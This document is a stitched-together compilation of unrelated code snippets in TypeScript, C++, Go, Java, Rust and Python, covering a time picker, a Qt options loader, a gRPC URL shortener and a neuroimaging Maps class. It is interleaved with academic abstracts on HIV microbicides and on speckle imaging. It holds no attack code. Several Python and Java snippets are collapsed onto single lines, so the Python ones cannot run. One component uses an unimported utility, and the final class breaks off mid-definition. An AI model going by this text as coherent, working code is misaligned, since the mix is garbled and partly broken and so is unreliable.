import { MuiPickersUtilsProvider, KeyboardTimePicker } from '@material-ui/pickers'
import { makeStyles } from '@material-ui/core'
import React from 'react'

interface TimeProps {
  id: string
  label: string
  time: Date
  disabled: boolean
  // The first argument is the picker id, matching the call in handleChange below.
  onChange: (id: string, time: Date) => void
}

const useStyles = makeStyles(() => ({
  timePicker: {
    width: 130,
  },
}))

function SingleTime (props: TimeProps) {
  const classes = useStyles()

  const handleChange = (date: any) => {
    // Ignore partially typed or invalid times.
    if (date && date.isValid()) {
      props.onChange(props.id, date.toDate())
    }
  }

  return (
    <MuiPickersUtilsProvider utils={MomentUtils}>
      <KeyboardTimePicker
        disabled={props.disabled}
        label={props.label}
        value={props.time}
        onChange={handleChange}
        className={classes.timePicker}
      />
    </MuiPickersUtilsProvider>
  )
}

export default SingleTime
Making prevention public: The co-production of gender and technology in HIV prevention research This paper brings together the study of transnational flows in global health and the gendering of technological artefacts. It does so through a case study of vaginal microbicides for HIV prevention, which have commonly been advocated for as a tool for women’s empowerment in parts of the world where HIV is most prevalent, namely sub-Saharan Africa. Drawing on fieldwork in the UK and Zambia, I argue that there is nothing inherently gendered about this ‘woman-controlled’ technology. Combining the notions of scripting and ‘making things public’, I demonstrate the political nature of transnational technology design and testing in the field of sexual health. Rather than framing this in terms of ethical debates, as is frequently the case in studies about the ‘global South’, I ground the analysis in the scripting and de-scripting of technologies and users. By focusing on how things are made public in HIV prevention, I draw attention to the normative, transformative and political potentials of new technologies, such as microbicides, and discuss the implications for their therapeutic success.
#include "options.h"
#include "handler.h"
#include <dirent.h>
#include <string>
#include <vector>
#include <iostream>
#include <QtQuick>
#include <algorithm>

const std::string configDir = "/opt/etc/draft";

// Create options and add them to the screen.
Options::Options(MainView* mainView, QGuiApplication* app) : mainView(mainView), optionsView(mainView->rootObject()->findChild<QQuickItem*>("optionsArea")), app(app)
{
    std::vector<std::string> filenames;

    // If the config directory doesn't exist, then print an error and stop.
    if(!Options::read_directory(configDir, filenames)) {
        Options::error("Failed to read directory - it does not exist.");
        return;
    }
    std::sort(filenames.begin(), filenames.end());

    for(std::string f : filenames) {
        std::cout << "parsing file " << f << std::endl;

        QFile file((configDir + "/" + f).c_str());
        if (!file.open(QIODevice::ReadOnly | QIODevice::Text)) {
            Options::error("Couldn't find the file " + f + ".");
            break;
        }

        QTextStream in(&file);
        OptionItem opt;
        while (!in.atEnd()) {
            std::string line = in.readLine().toStdString();
            if(line.length() == 0)
                continue; // skip blank lines silently

            size_t sep = line.find("=");
            if(sep == line.npos) {
                std::cout << "ignoring malformed line \"" << line << "\" in file \"" << f << "\"" << std::endl;
                continue;
            }

            std::string lhs = line.substr(0,sep);
            std::string rhs = line.substr(sep+1);
            if     (lhs == "name")    opt.name = rhs;
            else if(lhs == "desc")    opt.desc = rhs;
            else if(lhs == "imgFile") opt.imgFile = rhs;
            else if(lhs == "call")    opt.call = rhs;
            else if(lhs == "term")    opt.term = rhs;
            else std::cout << "ignoring unknown parameter \"" << line << "\" in file \"" << f << "\"" << std::endl;
        }

        if(opt.call == "" || opt.term == "")
            continue;

        createOption(opt, optionList.size());
        optionList.push_back(opt);
    }
}

void Options::createOption(OptionItem &option, size_t index)
{
    QQuickView* opt = new QQuickView();
    opt->setSource(QDir(DEPLOYMENT_PATH).filePath("qml/MenuItem.qml"));
    opt->show();

    QQuickItem* root = opt->rootObject();
    root->setProperty("itemNumber", QVariant(index));
    root->setParentItem(optionsView);
    root->setProperty("t_name",QVariant(option.name.c_str()));
    root->setProperty("t_desc",QVariant(option.desc.c_str()));
    root->setProperty("t_imgFile",QVariant(("file://"+configDir+"/icons/"+option.imgFile+".png").c_str()));

    QObject* mouseArea = root->children().at(0);
    Handler* handler = new Handler(option.call, option.term, app, mainView, mouseArea);
    root->children().at(0)->installEventFilter(handler);

    option.object = opt;
    option.handler = handler;
}

void Options::error(std::string text)
{
    std::cout << "!! Error: " << text << std::endl;
}

// Stolen shamelessly from <NAME>
bool Options::read_directory(const std::string name, std::vector<std::string>& filenames)
{
    DIR* dirp = opendir(name.c_str());
    if(dirp == nullptr) {
        return false;
    }
    struct dirent * dp;
    while ((dp = readdir(dirp)) != NULL) {
        std::string dn = dp->d_name;
        if(dn == "." || dn == ".."|| dn == "icons")
            continue;
        filenames.push_back(dn);
    }
    closedir(dirp);
    return true;
}
export * from "fs/promises"; import { stat } from "fs/promises"; type PathLike = string | Buffer | URL; export async function exists(path: PathLike): Promise<boolean> { try { await stat(path); return true; } catch (e) { return false; } }
/**
 * Solve StringIndexOutOfBoundsException for some devices.
 * Without this, Selection.setSelection(...) would always throw an exception
 * and crash the app.
 *
 * @param widget
 * @param buffer
 * @param event
 * @return <code>true</code> when the event is handled, <code>false</code> otherwise.
 */
@Override
public boolean onTouchEvent(TextView widget, Spannable buffer, MotionEvent event) {
    return true;
}
def print_multi_list(list_ch_info=None, sep=";"): if not list_ch_info or not isinstance(list_ch_info, (list, tuple)): print("Print information from a list of lists from multiple " "channels obtained from `ch_download_latest_multi`.") return False if len(list_ch_info) < 1: print("Empty list.") return False flat_list = [] for sublist in list_ch_info: if not sublist: flat_list.append(None) continue for item in sublist: if not item: flat_list.append(None) continue flat_list.append(item) n_items = len(flat_list) print("Summary of downloads") out_list = [] for it, item in enumerate(flat_list, start=1): out = "{:2d}/{:2d}".format(it, n_items) + f"{sep} " if not item: out += "empty item. Failure establishing server connection?" out_list.append(out) continue if "claim_id" in item: out += "{}".format(item["claim_id"]) + f"{sep} " out += "{:3d}/{:3d}".format(item["blobs_completed"], item["blobs_in_stream"]) + f"{sep} " out += '"{}"'.format(item["channel_name"]) out += f"{sep} " out += '"{}"'.format(item["claim_name"]) out_list.append(out) elif "error" in item: out_list.append(out + '"{}"'.format(item["error"])) else: out_list.append(out + "not downloaded") print("\n".join(out_list)) return True
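A hedged example of the input shape print_multi_list expects: a list of per-channel lists whose items are dicts carrying either claim metadata or an error (every field value below is made up):

# Hypothetical result of ch_download_latest_multi for two channels.
list_ch_info = [
    [{"claim_id": "8f0ac9...", "blobs_completed": 12, "blobs_in_stream": 12,
      "channel_name": "@some-channel", "claim_name": "some-video"}],
    [{"error": "couldn't find claim"}, None],
]
print_multi_list(list_ch_info, sep=";")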
/**********************************************************************************
 * linearSearch()
 * This function performs a linear search on an integer array. The list array,
 * which has size elements, is searched for the number stored in value. If the
 * number is found, its array subscript is returned. Otherwise, -1 is returned.
 **********************************************************************************/
int SearchSort::linearSearch(int list[], int size, int value){
    int index = 0;
    int position = -1;
    bool found = false;

    while (index < size && !found) {
        if (list[index] == value){
            found = true;
            position = index;
        }
        index++;
    }
    return position;
}
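A brief usage example, assuming linearSearch is declared static in the SearchSort class and exposed through a header (otherwise call it through an instance):

#include <iostream>
#include "SearchSort.h"  // assumed header declaring SearchSort

int main() {
    int scores[] = {34, 19, 72, 5, 61};
    // Search the 5-element array for 72; prints the subscript (2 here) or -1.
    int pos = SearchSort::linearSearch(scores, 5, 72);
    std::cout << "found at index " << pos << std::endl;
    return 0;
}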
package handler

import (
	"context"

	"google.golang.org/protobuf/types/known/timestamppb"

	"github.com/indrasaputra/aptx/entity"
	aptxv1 "github.com/indrasaputra/aptx/proto/indrasaputra/aptx/v1"
	"github.com/indrasaputra/aptx/usecase"
)

// AptxService handles HTTP/2 gRPC request for URL aptx.
// It implements gRPC service server.
type AptxService struct {
	aptxv1.UnimplementedAptxServiceServer

	creator usecase.CreateShortURL
	getter  usecase.GetURL
}

// NewAptxService creates an instance of AptxService.
func NewAptxService(creator usecase.CreateShortURL, getter usecase.GetURL) *AptxService {
	return &AptxService{
		creator: creator,
		getter:  getter,
	}
}

// ShortenURL handles HTTP/2 gRPC request similar to POST in HTTP/1.1.
func (as *AptxService) ShortenURL(ctx context.Context, request *aptxv1.ShortenURLRequest) (*aptxv1.ShortenURLResponse, error) {
	if request == nil {
		return nil, entity.ErrEmptyURL()
	}

	url, cerr := as.creator.Create(ctx, request.GetOriginalUrl())
	if cerr != nil {
		return nil, cerr
	}
	return createShortenURLResponseFromEntity(url), nil
}

// GetAllURL handles HTTP/2 gRPC request similar to GET in HTTP/1.1.
// Its specific job is to get all available URLs in the system.
func (as *AptxService) GetAllURL(ctx context.Context, request *aptxv1.GetAllURLRequest) (*aptxv1.GetAllURLResponse, error) {
	if request == nil {
		return nil, entity.ErrEmptyURL()
	}

	// Use the caller's context so cancellation and deadlines propagate.
	urls, err := as.getter.GetAll(ctx)
	if err != nil {
		return nil, err
	}
	return createGetAllURLResponseFromEntity(urls), nil
}

// StreamAllURL handles HTTP/2 gRPC request similar to GET in HTTP/1.1.
// Its specific job is to get all available URLs in the system using stream.
func (as *AptxService) StreamAllURL(request *aptxv1.StreamAllURLRequest, stream aptxv1.AptxService_StreamAllURLServer) error {
	urls, err := as.getter.GetAll(stream.Context())
	if err != nil {
		return err
	}

	for _, url := range urls {
		resp := createStreamAllURLResponseFromEntity(url)
		if serr := stream.Send(resp); serr != nil {
			return entity.ErrInternal(serr.Error())
		}
	}
	return nil
}

// GetURLDetail handles HTTP/2 gRPC request similar to GET in HTTP/1.1.
// Its specific job is to get a detail of a single short URL.
func (as *AptxService) GetURLDetail(ctx context.Context, request *aptxv1.GetURLDetailRequest) (*aptxv1.GetURLDetailResponse, error) {
	if request == nil {
		return nil, entity.ErrEmptyURL()
	}

	url, err := as.getter.GetByCode(ctx, request.GetCode())
	if err != nil {
		return nil, err
	}
	return createGetURLDetailResponseFromEntity(url), nil
}

func createShortenURLResponseFromEntity(url *entity.URL) *aptxv1.ShortenURLResponse {
	return &aptxv1.ShortenURLResponse{
		Url: createShortenerV1URL(url),
	}
}

func createGetAllURLResponseFromEntity(urls []*entity.URL) *aptxv1.GetAllURLResponse {
	res := &aptxv1.GetAllURLResponse{}
	for _, url := range urls {
		res.Urls = append(res.Urls, createShortenerV1URL(url))
	}
	return res
}

func createStreamAllURLResponseFromEntity(url *entity.URL) *aptxv1.StreamAllURLResponse {
	return &aptxv1.StreamAllURLResponse{
		Url: createShortenerV1URL(url),
	}
}

func createGetURLDetailResponseFromEntity(url *entity.URL) *aptxv1.GetURLDetailResponse {
	return &aptxv1.GetURLDetailResponse{
		Url: createShortenerV1URL(url),
	}
}

func createShortenerV1URL(url *entity.URL) *aptxv1.URL {
	return &aptxv1.URL{
		Code:        url.Code,
		ShortUrl:    url.ShortURL,
		OriginalUrl: url.OriginalURL,
		ExpiredAt:   timestamppb.New(url.ExpiredAt),
		CreatedAt:   timestamppb.New(url.CreatedAt),
	}
}
def pack(self, directory, out_asar, unpackeds=tuple()): with open(out_asar, "wb") as out_asarfile: fileinfos = self.__dir_to_fileinfos(directory, unpackeds=unpackeds) json_header = json.dumps(fileinfos, sort_keys=True, separators=(',', ':')) json_header_bytes = json_header.encode('utf-8') header_string_size = len(json_header_bytes) data_size = 4 aligned_size = roundup(header_string_size, data_size) header_size = aligned_size + 8 header_object_size = aligned_size + data_size out_asarfile.seek(0) out_asarfile.write( struct.pack('<4I', data_size, header_size, header_object_size, header_string_size)) out_asarfile.write(json_header_bytes + b'\0' * (aligned_size - header_string_size)) baseoffset = roundup(header_string_size + 16, 4) for path, fileinfo in _walk_fileinfos(fileinfos, ignore_unpacked=True): with open(os.path.join(directory, path), 'rb') as fp: out_asarfile.seek(int(fileinfo['offset']) + baseoffset) out_asarfile.write(fp.read()) return hashlib.sha256(json_header_bytes).hexdigest()
Imaging through scattering medium from multiple speckle images using microlens array
We propose and experimentally demonstrate a new method for imaging objects hidden in a scattering medium from multiple speckle images. The objects, hidden between two layers of biological tissue (chicken breast), are reconstructed from many speckled images formed by a microlens array. Each microlens in the array projects a small, different speckle image of the hidden object onto a CCD camera. The entire set of noisy images from the array is digitally processed to obtain the desired image of the hidden objects. Building on this first method, we developed a modified algorithm implemented on the same optical system. This modified algorithm, based on the point-source reference method, improves the resolution of the original one. Laboratory experiments with two kinds of objects are presented.
import { platformBrowserDynamic } from '@angular/platform-browser-dynamic'; import { CdfModule } from './cdf.module'; platformBrowserDynamic().bootstrapModule(CdfModule);
/**
 * Copyright 2021 Huawei Technologies Co., Ltd
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#ifndef MINDSPORE_CCSRC_PS_CORE_CLUSTER_CONFIG_H_
#define MINDSPORE_CCSRC_PS_CORE_CLUSTER_CONFIG_H_

#include <cstdint>
#include <string>
#include <iostream>
#include <memory>
#include <utility>

#include "utils/log_adapter.h"

namespace mindspore {
namespace ps {
namespace core {
/*
 * Configuration information read through environment variables and configuration files, generally immutable.
 */
struct ClusterConfig {
  explicit ClusterConfig(const uint32_t &worker_num, const uint32_t &server_num, std::string host,
                         const uint16_t &port)
      : initial_worker_num(worker_num),
        initial_server_num(server_num),
        heartbeat_interval(3),
        scheduler_host(host),
        scheduler_port(port),
        heartbeat_timeout(30),
        cluster_available_timeout(300),
        connect_interval(3000),
        scheduler_timeout(30) {}

  // Configured through the environment variable MS_WORKER_NUM.
  uint32_t initial_worker_num;
  // Configured through the environment variable MS_SERVER_NUM.
  uint32_t initial_server_num;
  // The interval for sending heartbeat packets between worker node, server node and scheduler node is 3 seconds.
  uint32_t heartbeat_interval;
  std::string scheduler_host;
  uint16_t scheduler_port;
  // The timeout for worker node and server node sending heartbeat packets to scheduler node is 30 seconds.
  uint32_t heartbeat_timeout;
  // Timeout period for cluster preparation is 300 seconds.
  uint32_t cluster_available_timeout;
  // The interval between client connection attempts to the server is 3000 ms.
  uint32_t connect_interval;
  // When the scheduler exits, the worker and server can continue to work for 5 hours.
  int64_t scheduler_timeout;
};
}  // namespace core
}  // namespace ps
}  // namespace mindspore
#endif  // MINDSPORE_CCSRC_PS_CORE_CLUSTER_CONFIG_H_
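A minimal construction sketch for the struct above; the worker/server counts and the scheduler endpoint are illustrative values, not taken from the original sources:

#include <cstdint>
#include "ps/core/cluster_config.h"

// Illustrative values: two workers, one server, scheduler at 127.0.0.1:8081.
void BuildSampleConfig() {
  mindspore::ps::core::ClusterConfig config(2, 1, "127.0.0.1", 8081);
  // The remaining fields keep the constructor defaults,
  // e.g. heartbeat_interval == 3 s and cluster_available_timeout == 300 s.
  (void)config;
}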
/**
 * Generates all permutations of 0 .. n-1 without repetition with order
 *
 * @author Dr. Matthias Laux
 */
public class Permutations {

    private int[][] permutations;
    private int resultIndex = 0;

    /**
     * Generates all permutations of 0 .. n-1 without repetition with order. The
     * results are collected in an integer array whose first dimension is equal
     * to n! which is the number of permutations. The second dimension of the
     * array contains the actual n permutation indexes
     *
     * @param n
     * @return
     */
    public int[][] generate(int n) {
        int[] d = new int[n];
        for (int i = 0; i < n; i++) {
            d[i] = i;
        }
        return generate(d);
    }

    /**
     *
     * @param input
     * @return
     */
    public int[][] generate(String input) {
        int[] d = new int[input.length()];
        for (int i = 0; i < input.length(); i++) {
            d[i] = input.charAt(i);
        }
        return generate(d);
    }

    /**
     *
     * @param input
     * @return
     */
    public int[][] generate(int[] input) {
        if (input == null) {
            throw new NullPointerException("input may not be null");
        }
        int n = input.length;
        int permutationCount = Tools.factorial(n);
        permutations = new int[permutationCount][n];
        resultIndex = 0; // reset so the generator can be reused safely
        permutate(new int[n], 0, input);
        return permutations;
    }

    /**
     * Recursively create the permutations based on the actual values in d[]
     *
     * @param resultCollector
     * @param resultCollectorIndex
     * @param permutableValues
     */
    private void permutate(int[] resultCollector, int resultCollectorIndex, int[] permutableValues) {
        if (permutableValues.length > 0) {

            //.... There are permutable values left, start the next level of the recursion with them, reducing the permutable value list accordingly
            for (int i = 0; i < permutableValues.length; i++) {
                int[] nextResultCollector = Arrays.copyOf(resultCollector, resultCollector.length);
                nextResultCollector[resultCollectorIndex] = permutableValues[i];
                permutate(nextResultCollector, resultCollectorIndex + 1, reduce(permutableValues, i));
            }

        } else {

            //.... We have reached the end of a tree walk, store the assembled result in the global collector and increase the global index
            System.arraycopy(resultCollector, 0, permutations[resultIndex], 0, resultCollector.length);
            resultIndex++;
        }
    }

    /**
     * Create a new int[] from d[] while removing the entry at index k
     *
     * @param d
     * @param k
     * @return
     */
    private int[] reduce(int[] d, int k) {
        int[] r = new int[d.length - 1];
        int ind = 0;
        for (int i = 0; i < d.length; i++) {
            if (i != k) {
                r[ind++] = d[i];
            }
        }
        return r;
    }
}
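A short usage example for the generator above; for n = 3 it produces the 6 orderings of {0, 1, 2} in lexicographic order:

// Enumerate every ordering of {0, 1, 2}.
Permutations p = new Permutations();
int[][] all = p.generate(3);
for (int[] perm : all) {
    System.out.println(java.util.Arrays.toString(perm));
}
// [0, 1, 2], [0, 2, 1], [1, 0, 2], [1, 2, 0], [2, 0, 1], [2, 1, 0]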
// Called every time the scheduler runs while the command is scheduled. @Override public void execute() { m_IntakeSubsystem.IntakeIn(); m_IntakeSubsystem.MidtakeOn(); if(m_IntakeSubsystem.ballExist()){ m_LEDSubsystem.Lime(); } else{ m_LEDSubsystem.White(); } }
/**
 * Initializes all queue resources.
 */
extern FilaEntrada *iniciaFila()
{
    FilaEntrada *fila;

    fila = (FilaEntrada *)malloc(sizeof(FilaEntrada));
    if (fila == NULL) {
        logMessage("FLENT", "Error creating data queue!", true);
        return NULL;
    }
    fila->head = NULL;
    fila->tail = NULL;
    fila->quantidade = 0;

    /* pthread_mutex_init returns 0 on success and an error number otherwise */
    if (pthread_mutex_init(&fila->mutex, NULL) != 0) {
        logMessage("FLENT", "Error initializing mutex!", true);
        free(fila);
        return NULL;
    }
    return fila;
}
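A small usage sketch; the enqueue/dequeue operations live elsewhere, so this only shows NULL-safe initialization:

void queue_example(void)
{
    FilaEntrada *fila = iniciaFila();
    if (fila == NULL) {
        /* failure was already logged by iniciaFila via logMessage */
        return;
    }
    /* producer/consumer threads may now lock fila->mutex and use head/tail */
}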
/** * Performs a Consul transaction. * * PUT /v1/tx * * @deprecated Replaced by {@link #performTransaction(TransactionOptions, Operation...)} * * @param consistency The consistency to use for the transaction. * @param operations A list of KV operations. * @return A {@link ConsulResponse} containing results and potential errors. */ @Deprecated public ConsulResponse<TxResponse> performTransaction(ConsistencyMode consistency, Operation... operations) { Map<String, Object> query = consistency == ConsistencyMode.DEFAULT ? ImmutableMap.of() : ImmutableMap.of(consistency.toParam().get(), "true"); try { return http.extractConsulResponse(api.performTransaction(RequestBody.create(MediaType.parse("application/json"), Jackson.MAPPER.writeValueAsString(kv(operations))), query)); } catch (JsonProcessingException e) { throw new ConsulException(e); } }
/**
 * The base quartz job
 *
 * @author davitp
 */
public class QuartzExecutorJob implements Job {

    /**
     * Create and invoke corresponding executor by type
     *
     * @param context The execution context
     * @throws JobExecutionException Thrown if something went wrong
     */
    @Override
    public void execute(JobExecutionContext context) throws JobExecutionException {

        // wrap context into an abstract type
        var executorContext = new QuartzExecutorContext(context);

        // try get type
        var type = executorContext.getType();

        // nothing to do without type
        if(Str.blank(type)){
            throw new JobExecutionException("Type is missing");
        }

        // try get supplier
        var supplier = JobOps.getExecutor(type, context);

        // could not find supplier, something went wrong
        if(supplier == null){
            throw new JobExecutionException("The requested job type is not supported");
        }

        // create new instance using supplier
        var tryInstance = Try.of(() -> supplier.apply(executorContext));

        // could not create instance from supplier, almost not possible
        if(!tryInstance.isSuccess()){
            throw new JobExecutionException("Unable to create an executor from the given supplier", tryInstance.getCause());
        }

        // supplier returned null, cannot execute
        if(tryInstance.get() == null){
            throw new JobExecutionException("Supplier of executor returned null. Cannot execute...");
        }

        // try execute job and report otherwise
        try {
            tryInstance.get().execute();
        } catch (JobExecutorException ex) {
            throw new JobExecutionException("Error while executing the job instance", ex);
        }
    }
}
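For context, a hedged sketch of how a job of this class would typically be scheduled with the standard Quartz builders; the "type" job-data key and the trigger cadence are illustrative, not taken from this file:

import org.quartz.*;
import org.quartz.impl.StdSchedulerFactory;

class QuartzExecutorJobExample {
    static void scheduleSample() throws SchedulerException {
        // Job data carries the executor type that execute() reads back via getType().
        JobDetail job = JobBuilder.newJob(QuartzExecutorJob.class)
                .withIdentity("sample-job", "default")
                .usingJobData("type", "HTTP_CALL") // hypothetical executor type
                .build();

        // Fire every 30 seconds, forever.
        Trigger trigger = TriggerBuilder.newTrigger()
                .withIdentity("sample-trigger", "default")
                .withSchedule(SimpleScheduleBuilder.simpleSchedule()
                        .withIntervalInSeconds(30)
                        .repeatForever())
                .build();

        Scheduler scheduler = StdSchedulerFactory.getDefaultScheduler();
        scheduler.start();
        scheduler.scheduleJob(job, trigger);
    }
}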
def process_requirement(self, requirement, cache=False): if requirement.is_valid: result = requirement.passes if cache: self.cache.merge(requirement.cache) return result log.debug("invalid requirement: %s - fail", self.content) return False
use std::marker::PhantomData;
use std::ops::{Index, IndexMut};

use na;
use na::{Translate, Rotate, Transform, Dim};
use math::{Scalar, Point, Vect};

/// Geometric description of a polyline.
#[derive(Clone)]
pub struct Polyline<N, P, V> {
    /// Coordinates of the polyline vertices.
    pub coords: Vec<P>,
    /// Coordinates of the polyline normals.
    pub normals: Option<Vec<V>>,
    phantom: PhantomData<N>
}

impl<N, P, V> Polyline<N, P, V> {
    /// Creates a new polyline.
    pub fn new(coords: Vec<P>, normals: Option<Vec<V>>) -> Polyline<N, P, V> {
        Polyline {
            coords: coords,
            normals: normals,
            phantom: PhantomData
        }
    }
}

impl<N: Scalar, P: Point<N, V>, V: Vect<N>> Polyline<N, P, V> {
    /// Translates each vertex of this polyline.
    pub fn translate_by<T: Translate<P>>(&mut self, t: &T) {
        for c in self.coords.iter_mut() {
            *c = t.translate(c);
        }
    }

    /// Rotates each vertex and normal of this polyline.
    // XXX: we should use Rotate<P> instead of the .set_coord.
    // We cannot make it a Rotate because the `Rotate` bound cannot appear twice… we have, again,
    // to wait for the trait reform.
    pub fn rotate_by<R: Rotate<V>>(&mut self, r: &R) {
        for c in self.coords.iter_mut() {
            let rc = r.rotate(c.as_vec());
            c.set_coords(rc);
        }

        for n in self.normals.iter_mut() {
            for n in n.iter_mut() {
                *n = r.rotate(n);
            }
        }
    }

    /// Transforms each vertex and rotates each normal of this polyline.
    pub fn transform_by<T: Transform<P> + Rotate<V>>(&mut self, t: &T) {
        for c in self.coords.iter_mut() {
            *c = t.transform(c);
        }

        for n in self.normals.iter_mut() {
            for n in n.iter_mut() {
                *n = t.rotate(n);
            }
        }
    }

    /// Scales each vertex of this polyline.
    pub fn scale_by_scalar(&mut self, s: &N) {
        for c in self.coords.iter_mut() {
            *c = *c * *s
        }
        // FIXME: do something for the normals?
    }
}

impl<N, P, V> Polyline<N, P, V>
    where N: Scalar,
          P: Index<usize, Output = N> + IndexMut<usize, Output = N>,
          V: Dim + Index<usize, Output = N> {
    /// Scales each vertex of this mesh.
    #[inline]
    pub fn scale_by(&mut self, s: &V) {
        for c in self.coords.iter_mut() {
            for i in 0 .. na::dim::<V>() {
                c[i] = (*c)[i] * s[i];
            }
        }
        // FIXME: do something for the normals?
    }
}
class Maps: """Store data of several maps and implement operations on it.""" def __init__(self, df=None, template=None, Ni=None, Nj=None, Nk=None, affine=None, mask=None, atlas=None, groupby_col=None, x_col='x', y_col='y', z_col='z', weight_col='weight', save_memory=True, verbose=None, dtype=np.float64 ): """ Args: df (pandas.DataFrame): Pandas DataFrame containing the (x,y,z) coordinates, the weights and the map id. The names of the columns can be specified. template (nibabel.Nifti1Image): Template storing the box size and affine. If not None, Will overwrite parameters Ni, Nj, Nk and affine. Ni (int): X size of the bounding box. Nj (int): Y size of the bounding box. Nk (int): Z size of the bounding box. affine (numpy.ndarray): Array with shape (4, 4) storing the affine used to compute brain voxels coordinates from world cooridnates. mask (nibabel.Nifti1Image): Nifti1Image with 0 or 1 data. 0: outside the mask, 1: inside. atlas (Object): Object containing a nibabel.Nifti1Image or a path to it in atlas['maps'] and a list of the labels in atlas['labels'] groupby_col (str): Name of the column on which the groupby operation is operated. Or in an equivalent way, the name of the column storing the ids of the maps. x_col (str): Name of the column storing the x coordinates. y_col (str): Name of the column storing the y coordinates. z_col (str): Name of the column storing the z coordinates. weight_col (str): Name of the column storing the weights. """ if template is not None and (isinstance(template, nib.Nifti1Image) or isinstance(template, str)): template = nilearn.image.load_img(template) Ni, Nj, Nk = template.shape affine = template.affine elif template is not None: raise ValueError('Template not understood.' 'Must be a nibabel.Nifti1Image or a path to it.') elif isinstance(df, np.ndarray) and len(df.shape) == 3: Ni, Nj, Nk = df.shape elif isinstance(df, np.ndarray) and len(df.shape) == 4: Ni, Nj, Nk, _ = df.shape elif isinstance(df, nib.Nifti1Image) or isinstance(df, str): pass if mask is not None and not isinstance(mask, nib.Nifti1Image): raise ValueError('Mask must be an instance of nibabel.Nifti1Image') self._save_memory = save_memory self._mask = mask self._maps = None self._atlas = Atlas(atlas) self._maps_dense = None self._maps_atlas = None self._atlas_filter_matrix = None self._dtype = dtype self.verbose = verbose if isinstance(df, pd.DataFrame): if groupby_col is None: raise TypeError('Must specify column name to group by maps.') if Ni is None or Nj is None or Nk is None or affine is None: raise TypeError('Must specify Ni, Nj, Nk and affine to' 'initialize with dataframe.') col_names = { 'groupby': groupby_col, 'x': x_col, 'y': y_col, 'z': z_col, 'weight': weight_col } self._maps = build_maps_from_df(df, col_names, Ni, Nj, Nk, affine, mask, self.verbose, self._dtype) elif isinstance(df, nib.Nifti1Image) or isinstance(df, str) or isinstance(df, list): self._maps, Ni, Nj, Nk, affine = build_maps_from_img(df, dtype=self._dtype) elif isinstance(df, np.ndarray) and len(df.shape) == 2: self._maps = scipy.sparse.csr_matrix(df, dtype=self._dtype) elif isinstance(df, np.ndarray) and len(df.shape) == 3: df = self._flatten_array(df, _2D=1) self._maps = scipy.sparse.csr_matrix(df, dtype=self._dtype) elif isinstance(df, np.ndarray) and len(df.shape) == 4: df = df.reshape((-1, df.shape[-1]), order='F') self._maps = scipy.sparse.csr_matrix(df, dtype=self._dtype) elif isinstance(df, tuple): self._maps = scipy.sparse.csr_matrix(df, dtype=self._dtype) elif isinstance(df, int): self._maps = 
    # _____________CLASS_METHODS_____________ #

    @classmethod
    def empty(cls, **kwargs):
        """
        Create an empty Maps object.

        See the Maps.__init__ doc for valid kwargs.

        Returns:
            (Maps) Instance of Maps object.
        """
        return cls(df=None, **kwargs)

    @classmethod
    def zeros(cls, n_maps=1, **kwargs):
        """
        Create zero-valued maps of the given shape.

        See the Maps.__init__ doc for **kwargs parameters.

        Args:
            n_maps (int, Optional): Number of maps.

        Returns:
            (Maps) Instance of Maps object.
        """
        maps = cls.empty(**kwargs)
        maps.maps = csr_matrix((maps.prod_N, n_maps), dtype=maps._dtype)
        return maps

    @classmethod
    def random(cls, size, p=None, random_state=None, **kwargs):
        """
        Create random maps of the given size.

        Appropriate kwargs must be given to initialize an empty map.
        See the Maps.__init__ doc.

        Args:
            size: See the Maps.randomize doc.
            p: See the Maps.randomize doc.

        Returns:
            (Maps) Instance of Maps object.
        """
        maps = cls.empty(**kwargs)
        return maps.randomize(
            size,
            p=p,
            override_mask=False,
            inplace=True,
            random_state=random_state
        )

    @classmethod
    def copy_header(cls, other):
        """
        Create a Maps instance with the same header as the given Maps object.

        Args:
            other (Maps): Maps instance whose header information is copied.

        Returns:
            (Maps) Instance of Maps object.
        """
        maps = cls(Ni=other._Ni, Nj=other._Nj, Nk=other._Nk)
        maps._copy_header(other)
        return maps

    @classmethod
    def concatenate(cls, seq):
        """
        Concatenate a given sequence of Maps objects.

        For example, if the first object contains 1 map and the second
        2 maps, the concatenated object contains the 3 stacked maps.

        Args:
            seq (sequence): Sequence of Maps objects to concatenate.

        Returns:
            (Maps) Instance of Maps object.

        Raises:
            ValueError: If the shapes of the maps mismatch or the sequence
                is empty.
        """
        if not seq:
            raise ValueError('Empty sequence given.')

        res = Maps.copy_header(seq[0])
        res.maps = hstack([maps.maps for maps in seq])
        return res
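    # Example (illustrative sketch): creating and stacking maps. The box size
    # and affine are hypothetical.
    #
    #   a = Maps.zeros(n_maps=1, Ni=4, Nj=4, Nk=4, affine=np.eye(4))
    #   b = Maps.zeros(n_maps=2, Ni=4, Nj=4, Nk=4, affine=np.eye(4))
    #   Maps.concatenate([a, b]).n_m  # 3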
""" return cls(df=None, **kwargs) @classmethod def zeros(cls, n_maps=1, **kwargs): """ Create zero-valued maps of the given shape. See the Maps.__init__ doc for **kwargs parameters. Args: n_maps (int, Optional): Number of maps. Returns: (Maps) Instance of Maps object. """ maps = cls.empty(**kwargs) maps.maps = csr_matrix((maps.prod_N, n_maps), dtype=maps._dtype) return maps @classmethod def random(cls, size, p=None, random_state=None, **kwargs): """ Create random maps from given size. Must give appropriates kwargs to initialize an empty map. See the Maps.__init__ doc. Args: size: See the Maps.randomize doc. p: See the Maps.randomize doc. Returns: (Maps) Instance of Maps object. """ maps = cls.empty(**kwargs) return maps.randomize( size, p=p, override_mask=False, inplace=True, random_state=random_state ) @classmethod def copy_header(cls, other): """ Create a Maps instance with same header as given Maps object. Args: other (Maps): Maps instance wanted informations. Returns: (Maps) Instance of Maps object. """ maps = cls(Ni=other._Ni, Nj=other._Nj, Nk=other._Nk) maps._copy_header(other) return maps @classmethod def concatenate(cls, seq): """ Concatenate given sequence of Maps object. For example if the first object contains 1 map and the second 2 maps, the concatenated object contains the 3 stacked maps. Args: seq (sequence): Sequence of Maps object to concatenate. Returns: (Maps) Instance of Maps object Raises: ValueError: If shapes of maps missmatch or empty sequence. """ if not seq: raise ValueError('Empty sequence given.') res = Maps.copy_header(seq[0]) res.maps = hstack([maps.maps for maps in seq]) return res # _____________PRIVATE_TOOLS_____________ # def _copy_header(self, other): 